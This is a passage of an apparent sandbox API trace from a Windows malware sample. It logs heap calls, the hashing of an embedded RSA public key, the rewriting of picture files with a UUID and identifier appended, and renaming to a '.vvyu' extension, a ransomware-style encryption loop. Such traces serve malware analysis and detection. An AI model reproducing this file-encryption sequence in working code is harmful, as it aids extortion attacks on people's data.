(HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.244] GetCurrentThreadId () returned 0x5d8 [0191.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3780 | out: hHeap=0x2c0000) returned 1 [0191.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.256] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xb65f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xb65f, lpOverlapped=0x0) returned 1 [0191.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.256] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb664, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.256] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.257] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.258] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.258] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.258] CloseHandle (hObject=0x584) returned 1 [0191.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.260] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sfoK-fQjQEuAHhw.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sfok-fqjqeuahhw.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sfoK-fQjQEuAHhw.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\sfok-fqjqeuahhw.jpg.vvyu")) returned 1 [0191.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.261] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.264] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2ebf700, ftCreationTime.dwHighDateTime=0x1d899a4, ftLastAccessTime.dwLowDateTime=0x88bd5040, ftLastAccessTime.dwHighDateTime=0x1d899dd, ftLastWriteTime.dwLowDateTime=0x88bd5040, ftLastWriteTime.dwHighDateTime=0x1d899dd, nFileSizeHigh=0x0, nFileSizeLow=0x17d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tQPcQXKKo-QTVp1zN.bmp", cAlternateFileName="TQPCQX~1.BMP")) returned 1 [0191.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3780 [0191.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3780 | out: hHeap=0x2c0000) returned 1 [0191.265] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\tQPcQXKKo-QTVp1zN.bmp") returned=".bmp" [0191.265] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\tQPcQXKKo-QTVp1zN.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\tqpcqxkko-qtvp1zn.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.265] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=6104) returned 1 [0191.265] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.270] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.270] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.272] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.272] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17d8, lpOverlapped=0x0) returned 1 [0191.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.273] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.274] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.274] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.274] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.274] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.274] GetLastError () returned 0x0 [0191.274] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.274] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.275] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.275] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.275] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17e0) returned 0x2ae6ea0 [0191.275] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3780 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af37c8 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.276] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6020 [0191.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) 